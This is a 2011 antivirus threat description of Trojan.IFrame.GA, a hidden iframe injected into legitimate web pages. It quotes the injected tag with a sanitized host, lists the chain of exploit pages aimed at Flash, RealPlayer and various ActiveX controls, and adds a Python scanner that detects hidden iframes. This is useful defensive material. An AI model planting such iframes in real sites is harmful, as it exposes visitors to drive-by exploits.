
Trojan.IFrame.GA


First posted on 21 November 2011.
Source: BitDefender

Aliases:

There are no other names known for Trojan.IFrame.GA.

Explanation:

Detects a type of malicious iframe injected into legitimate web pages.
The iframe tag looks like this:

<iframe src=http://sanitized/fxx.htm width=100 height=0>

I'll base this description on a site that was still live at the time of writing (many of them were sanitized or taken down): hxxp://www.*******.cn/a114/fxx.htm (please don't open that page in your browser unless you know what you're doing).

The fxx.htm page contains only a SCRIPT tag, and here the fun begins, with many iframes injected into the page:
* fx.htm - this one tries to exploit a vulnerability in FlashPlayer
* ../a1/ss.htm
* ../a1/MS06014.htm
* ../a1/sina.htm - if the Sina Downloader.DLoader.1 ActiveX Control is available
* ../a1/no.htm - if UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control is available
* ../a1/bfyy.htm - if MPS.StormPlayer ActiveX Control is available
* ../a1/GLWORLD.html - for GLIEDown.IEDown.1
* ../a1/real.htm - for RealPlayer IERPCtl.IERPCtl.1 if RealPlayer's version is older than 6.0.14.552 (or it)
* ../a1/real.hTml - if RealPlayer's version is newer than 6.0.14.552

fx.htm is detected as Trojan.Exploit.ANPI and, depending on the browser, leads to Trojan.Exploit.SSX for browsers whose User-Agent contains "msie", and to Trojan.JS.Redirector.E for all other browsers. This eventually leads to some Flash files detected as Exploit.SWF.Gen.
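As an added example (not part of the BitDefender write-up), a small Python scanner that flags iframes of the shape shown above: zero-sized or styled invisible, the way the injected fxx.htm frame is hidden from the visitor. The sample HTML is constructed for the example, and the sanitized host names are placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: one legitimate iframe plus two injected ones
# shaped like the tag described in the write-up (unquoted attributes, height=0).
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<iframe src="https://example.org/widget" width="300" height="200"></iframe>
<iframe src=http://sanitized/fxx.htm width=100 height=0>
<IFRAME SRC='http://sanitized/a1/ss.htm' WIDTH=0 HEIGHT=0 style="visibility: hidden"></IFRAME>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe>, quoted or unquoted, any case."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lowercases tag and attribute names
            self.iframes.append({name: (value or "") for name, value in attrs})


def _is_zero(value):
    """True when a width/height value parses to 0 (e.g. '0', '0px', ' 0')."""
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) == 0


def suspicious_iframes(html):
    """Return (src, reasons) for iframes that are zero-sized or styled invisible,
    the shape used to load an exploit page without the visitor noticing."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        reasons = []
        if _is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", "")):
            reasons.append("zero-size")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden-style")
        if reasons:
            findings.append((attrs.get("src", ""), reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML):
        print(f"suspicious iframe: src={src!r} reasons={reasons}")
```

Run over a saved copy of a page rather than the live site; the src values it reports are the URLs to block or investigate.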

Last update 21 November 2011
